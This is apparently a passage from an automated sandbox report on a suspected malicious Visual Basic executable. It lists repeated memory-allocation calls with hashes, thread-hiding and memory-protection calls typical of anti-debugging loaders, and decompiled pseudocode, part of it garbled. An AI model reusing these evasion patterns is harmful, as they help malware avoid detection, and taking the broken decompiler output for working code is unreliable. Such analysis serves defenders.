                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: af889176deefc5b81f901269433bb2722f3f5bfea4b2fea525f2f09fe40c8d5f
                    • Instruction ID: dd9a5c6af6fd09b8c8e4c1a1927ad5ca50fb9b34e95bcbee3cc8d21b213f21db
                    • Opcode Fuzzy Hash: af889176deefc5b81f901269433bb2722f3f5bfea4b2fea525f2f09fe40c8d5f
                    • Instruction Fuzzy Hash: 625178D5A2E743C6F493A1B040C59325490EED73595738BBB9723728C2A33E925B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 3e940ab75f2b5cc227a4351132cffde0ffe92c27f9895c19ca3bca2f0cfb7146
                    • Instruction ID: f04ef85e57464d38f5f7cf7b67c929dcd6045801e2b4643420f8f8a1c5d258ad
                    • Opcode Fuzzy Hash: 3e940ab75f2b5cc227a4351132cffde0ffe92c27f9895c19ca3bca2f0cfb7146
                    • Instruction Fuzzy Hash: 1851C6D8BAD613C5ED6390F1408253121A4EDF633A1728BFFD722B24C1523EB55B668E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: da9c1edb518218bb239491b89aec193fe0794570871e8a02a0d089b54413ed5c
                    • Instruction ID: f578c79c9141a8abb8b1606dfd78736d90e05d0a67cea67a90de1053e0bc5d91
                    • Opcode Fuzzy Hash: da9c1edb518218bb239491b89aec193fe0794570871e8a02a0d089b54413ed5c
                    • Instruction Fuzzy Hash: 416157D5A2E703C6F49365B040C55315090EEEB3595738BBB6723728C2A33E925B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 854f9e776a9284d129dab3806e1d8ee4831b990c68eab35dba93df347c292942
                    • Instruction ID: 14220ed2fc5b54d69fd5c9c4c8068abee3540661aa94a3506a76233922be589a
                    • Opcode Fuzzy Hash: 854f9e776a9284d129dab3806e1d8ee4831b990c68eab35dba93df347c292942
                    • Instruction Fuzzy Hash: F46157D5A6E703D6F49361B040815315490EEE73595B38BBB5B23B28C2A33E925B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: c2e03c2f0f27b7ed8137d04f7883e20745cad8a128389e41aa9cfce2352697bd
                    • Instruction ID: 2c670f9569c3f5c046462a3cd85450d5f3f1a4a5bcca18d4ffc7b5fe3070f62f
                    • Opcode Fuzzy Hash: c2e03c2f0f27b7ed8137d04f7883e20745cad8a128389e41aa9cfce2352697bd
                    • Instruction Fuzzy Hash: C86147D5A6E703C6F49361B040D55311090EEE73595B38BBB6723728C2A33E925B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 608b83de24fb2aa740ab89cdecda4ed38f2ca2f09dabe1b4ab0f1a5661841dd6
                    • Instruction ID: e6d68af55d4450c27ab108b00190406b53f5274bd00bbda93cbb1b35c154e091
                    • Opcode Fuzzy Hash: 608b83de24fb2aa740ab89cdecda4ed38f2ca2f09dabe1b4ab0f1a5661841dd6
                    • Instruction Fuzzy Hash: A25139D5A6E703C5F49361B000C15315090EED735A1738BBB9B23728C2A33E965B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: a82f57f750a3189c33ee348986793093c1d97bd0ccab35da9af6ce426a70c8fc
                    • Instruction ID: b7841e562ef01cd751a3d9af4389be5f7d7bfd22f40e6cdb2dee8dd7f5fb590c
                    • Opcode Fuzzy Hash: a82f57f750a3189c33ee348986793093c1d97bd0ccab35da9af6ce426a70c8fc
                    • Instruction Fuzzy Hash: 215148D5A6E703C6F49361B040C55315090EEEB3595738BBB5723728C2A33E965B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 35ac1d3181a626d136f9ff0fcbba8ed00933a6be2050b0e3a6602b80211d9532
                    • Instruction ID: a5e90ae7a324270897a59f41c59f1dabb2a87a328aa5f937cd5db48779c58eaf
                    • Opcode Fuzzy Hash: 35ac1d3181a626d136f9ff0fcbba8ed00933a6be2050b0e3a6602b80211d9532
                    • Instruction Fuzzy Hash: 0C5146D5A2E703C6F4A361B040C19315090EEE73595B38BBB5723728C2A33E965B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: c319a228e18c36fd75bb2de56b7bd9783ed530da086403176b8bd494d8308bcf
                    • Instruction ID: d3f461329d273cf472f2de325ba712dcbf8f4197129b28f42d7f0dbfe6a36026
                    • Opcode Fuzzy Hash: c319a228e18c36fd75bb2de56b7bd9783ed530da086403176b8bd494d8308bcf
                    • Instruction Fuzzy Hash: 994149D5A6E703C5F49361B040C19315490EED735A1738BBB5B23B18C2A33E965B369F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: e45db1eb65484177e27d876fcfe50798873eb298002bd0ccbb2a6cfcd9b92f09
                    • Instruction ID: cf260a87ebbc75286fac21cac4b372a03dd102c9637e78ce8bec650bfd951293
                    • Opcode Fuzzy Hash: e45db1eb65484177e27d876fcfe50798873eb298002bd0ccbb2a6cfcd9b92f09
                    • Instruction Fuzzy Hash: 05516AD6A2E703C5F49761B040C15315490EEE735A1738BBB5723B28C2A33E964B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 87a23e09164d7274a34927292eabaefdb79b5baa7e35d4d852a4711d55fd271b
                    • Instruction ID: 9e343baccb899ecc5cc3919aa871cf36ff82650864f3def726319fa8b8e3123c
                    • Opcode Fuzzy Hash: 87a23e09164d7274a34927292eabaefdb79b5baa7e35d4d852a4711d55fd271b
                    • Instruction Fuzzy Hash: EB5139D5A6E703C5F493A1B000C15315490EED735A1738BBB5723728C2A33E965B369F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 896f68c325f3d3ca74d05df1bc869852ba4ad6057f88d35e9d6e42cc1e32b9d5
                    • Instruction ID: b4f9855a72a6ca3a2a9b6422e7642865bc2f91aebd20f4f3ad210d5bddf01987
                    • Opcode Fuzzy Hash: 896f68c325f3d3ca74d05df1bc869852ba4ad6057f88d35e9d6e42cc1e32b9d5
                    • Instruction Fuzzy Hash: 805169D5A2E703C6F49361B041C15315090EED735A5738BBB5B23B28C2A33E925B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: f348270d44ca9b137f3140a7ed7f2a006364d9819a8dee0e988df36cbe624705
                    • Instruction ID: 6ac5455f763a1fd9da05b21b3ffc156118c2c26f8342f0f7b634dadb75d93548
                    • Opcode Fuzzy Hash: f348270d44ca9b137f3140a7ed7f2a006364d9819a8dee0e988df36cbe624705
                    • Instruction Fuzzy Hash: D95139D5A6E703C6F493A1B040C15315490EED735A1738BBB5723B28C2A33E965B369F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 27e0b14e834d5b24c4dd4f686364561b7a2100981f800194cff90b2100e0e3bb
                    • Instruction ID: 397ede0f76befe48db6ad2a749e3c6f80ad2d6b669aaab26717ec1553c3aac0b
                    • Opcode Fuzzy Hash: 27e0b14e834d5b24c4dd4f686364561b7a2100981f800194cff90b2100e0e3bb
                    • Instruction Fuzzy Hash: 1E5138D5A6E703C6F49361B000C55315090EED735A1738BBB9B23B28C2A33E965B369F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: bd1b27b818a1436a6cf5c0cde34e47fde22c111844f83fa3767ffd03e12b4a6e
                    • Instruction ID: 0896eed17ac9a97f53b468c001dbf4cec7f92410e1fe5e7282b7f4692b9f3f0e
                    • Opcode Fuzzy Hash: bd1b27b818a1436a6cf5c0cde34e47fde22c111844f83fa3767ffd03e12b4a6e
                    • Instruction Fuzzy Hash: 6D416AD5A6E743C5F49361B040D153154A0EED735A1738BBB5B23B18C2A33E965B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    • LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                      • Part of subcall function 00315A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00315609,00000040,00310570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00315A87
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                    • String ID:
                    • API String ID: 449006233-0
                    • Opcode ID: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                    • Instruction ID: 95965a8509b89ffdc4a01c401158ae78adc07f83252340c1115a1ca75323679c
                    • Opcode Fuzzy Hash: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                    • Instruction Fuzzy Hash: B7614961904741CEDB2BCF28C8D47E17A92AF6B330F5682A9CDA64F2D6D365C8C1C712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                    • Instruction ID: 61a3a0aa19a0e419f4cc1bc6b468006305d751e355fe8f99b6ac36853821b287
                    • Opcode Fuzzy Hash: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                    • Instruction Fuzzy Hash: 254127306443019FEB2AAF64C895BE973A5BF1C350FA14116FE868B1E1D7B5D8C4CA12
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                    • Instruction ID: 3ec676f0f83f5df5c1d9449c1b4e4165860825e4063bb571a0fd7c23554af4b9
                    • Opcode Fuzzy Hash: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                    • Instruction Fuzzy Hash: 1331F771B80611DFCB699A2CDC55BE673E8BF09320F154325FCA9D3692D724E8C68B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                    • Instruction ID: 80c7293728723aeb2a857b34c532fde15cafb0e4e5c4cfe2e565464c56f617b2
                    • Opcode Fuzzy Hash: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                    • Instruction Fuzzy Hash: 2BF08CB43062029FCB0AEA24D6D4FD473A4EF5D3A0F6684A1EC85C7A63D334EC80C510
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                    • Instruction ID: c774c3d1e9a88e27358d1c86903a8312c879459471df9d3be9315755b80da27e
                    • Opcode Fuzzy Hash: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                    • Instruction Fuzzy Hash: 68C092B36405808FEF02CE08C886B8073B1FB25E84B4904D4E803CF612E328ED01CF00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                    • Instruction ID: 53564383bf43054fcb6bc85e7037885d87c04f7f94de5ee9bb9c5ed8a313171f
                    • Opcode Fuzzy Hash: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                    • Instruction Fuzzy Hash: 08B09234221A408FCA41CE08C180E4073A0BB08660B010680E8208BBA1C324E804CA00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 56%
                    			E0040C053(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				signed int _v32;
                    				intOrPtr _v40;
                    				char _v48;
                    				char _v56;
                    				char _v64;
                    				char _v72;
                    				char _v80;
                    				signed int _v100;
                    				signed int _v104;
                    				signed int _v108;
                    				signed int _v112;
                    				long long _v128;
                    				signed int _v132;
                    				signed int* _v136;
                    				signed int _v140;
                    				signed int _v144;
                    				signed char _t61;
                    				void* _t67;
                    				void* _t69;
                    				intOrPtr _t70;
                    				long long _t73;
                    
                    				_t70 = _t69 - 0xc;
                    				 *[fs:0x0] = _t70;
                    				L00401120();
                    				_v16 = _t70;
                    				_v12 = 0x4010f8;
                    				_v8 = 0;
                    				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401126, _t67);
                    				_v56 = 0x80020004;
                    				_v64 = 0xa;
                    				_v40 = 0x80020004;
                    				_v48 = 0xa;
                    				_push( &_v64);
                    				_t61 =  &_v48;
                    				_push(_t61);
                    				_v56 =  *0x4010f0;
                    				_t73 =  *0x4010e8;
                    				_v64 = _t73;
                    				asm("fld1");
                    				_v72 = _t73;
                    				L004011C8();
                    				L004011CE();
                    				_v128 = _t73;
                    				asm("fchs");
                    				asm("fnstsw ax");
                    				if((_t61 & 0x0000000d) == 0) {
                    					L004011CE();
                    					asm("fcomp qword [ebp-0x7c]");
                    					asm("fnstsw ax");
                    					asm("sahf");
                    					if(__eflags == 0) {
                    						_t17 =  &_v132;
                    						 *_t17 = _v132 & 0x00000000;
                    						__eflags =  *_t17;
                    					} else {
                    						_v132 = 1;
                    					}
                    					_v132 =  ~_v132;
                    					_v100 = __ax;
                    					__eax =  &_v64;
                    					_push( &_v64);
                    					__eax =  &_v48;
                    					_push( &_v48);
                    					_push(2);
                    					L004011C2();
                    					__esp = __esp + 0xc;
                    					__eax = _v100;
                    					__eflags = __eax;
                    					if(__eax != 0) {
                    						__eflags =  *0x40d594;
                    						if( *0x40d594 != 0) {
                    							_v136 = 0x40d594;
                    						} else {
                    							_push(0x40d594);
                    							_push(0x4024a8);
                    							L004011BC();
                    							_v136 = 0x40d594;
                    						}
                    						_v136 =  *_v136;
                    						_v100 =  *_v136;
                    						__eax =  &_v32;
                    						_v100 =  *_v100;
                    						__eax =  *((intOrPtr*)( *_v100 + 0x1c))(_v100,  &_v32);
                    						asm("fclex");
                    						_v104 = __eax;
                    						__eflags = _v104;
                    						if(_v104 >= 0) {
                    							_t37 =  &_v140;
                    							 *_t37 = _v140 & 0x00000000;
                    							__eflags =  *_t37;
                    						} else {
                    							_push(0x1c);
                    							_push(0x402498);
                    							_push(_v100);
                    							_push(_v104);
                    							L004011F2();
                    							_v140 = __eax;
                    						}
                    						__eax = _v32;
                    						_v108 = _v32;
                    						_v72 = 0x80020004;
                    						_v80 = 0xa;
                    						__eax = 0x10;
                    						L00401120();
                    						__esi =  &_v80;
                    						__edi = __esp;
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						_v108 =  *_v108;
                    						__eax =  *((intOrPtr*)( *_v108 + 0x60))(_v108, L"bdmphgm4oKLHkMpKtKuJ5249");
                    						asm("fclex");
                    						_v112 = __eax;
                    						__eflags = _v112;
                    						if(_v112 >= 0) {
                    							_t52 =  &_v144;
                    							 *_t52 = _v144 & 0x00000000;
                    							__eflags =  *_t52;
                    						} else {
                    							_push(0x60);
                    							_push(0x4024b8);
                    							_push(_v108);
                    							_push(_v112);
                    							L004011F2();
                    							_v144 = __eax;
                    						}
                    						__ecx =  &_v32;
                    						L004011B6();
                    					}
                    					asm("wait");
                    					_push(E0040C235);
                    					return __eax;
                    				}
                    				return __imp____vbaFPException();
                    			}

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C06F
                    • #678.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D4
                    • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D9
                    • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0F3
                    • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 0040C120
                    • __vbaNew2.MSVBVM60(004024A8,0040D594,?,?,00401126), ref: 0040C147
                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C194
                    • __vbaChkstk.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C1BF
                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C1F5
                    • __vbaFreeObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C20C
                    Strings
                    • bdmphgm4oKLHkMpKtKuJ5249, xrefs: 0040C1CD
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: __vba$CheckChkstkFreeHresult$#678ListNew2
                    • String ID: bdmphgm4oKLHkMpKtKuJ5249
                    • API String ID: 1840260717-316254104
                    • Opcode ID: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                    • Instruction ID: 0f554fd696726ee348e140752fea5efc4d458bc0cc6133c1b91ab8ab7a6ed652
                    • Opcode Fuzzy Hash: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                    • Instruction Fuzzy Hash: D8515670D40308EFDB04EF95C889B9DBBB9FB08704F10816AE548BB2A1CBB94844DF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E0040BD44(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
                    				void* _v3;
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				short _v32;
                    				void* _v48;
                    				struct HWND__* _v68;
                    				signed int _v72;
                    				signed int _v84;
                    				intOrPtr _v397355967;
                    				signed int _t34;
                    				short _t36;
                    				void* _t38;
                    				void* _t45;
                    				void* _t48;
                    				intOrPtr _t49;
                    
                    				_t38 = __ecx;
                    				asm("in al, dx");
                    				_t49 = _t48 - 0xc;
                    				 *[fs:0x0] = _t49;
                    				L00401120();
                    				_v16 = _t49;
                    				_v12 = E004010B0;
                    				_v8 = 0;
                    				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126, _t45);
                    				_t34 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
                    				asm("fclex");
                    				_v72 = _t34;
                    				if(_v72 >= 0) {
                    					_v84 = _v84 & 0x00000000;
                    				} else {
                    					_push(0x58);
                    					_push(0x4020d4);
                    					_push(_a4);
                    					_push(_v72);
                    					L004011F2();
                    					_v84 = _t34;
                    				}
                    				HideCaret(_v68);
                    				L004011EC();
                    				_push(0);
                    				_t36 =  *0x004039FF();
                    				asm("aam 0xa");
                    				 *_t36 =  *_t36 + _t36;
                    				_v397355967 = _v397355967 + _t38;
                    				_v32 = _t36;
                    				L004011E0();
                    				_push(E0040BE01);
                    				return _t36;
                    			}

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                    • HideCaret.USER32(?), ref: 0040BDBC
                    • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                    • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                    • String ID:
                    • API String ID: 2961917346-0
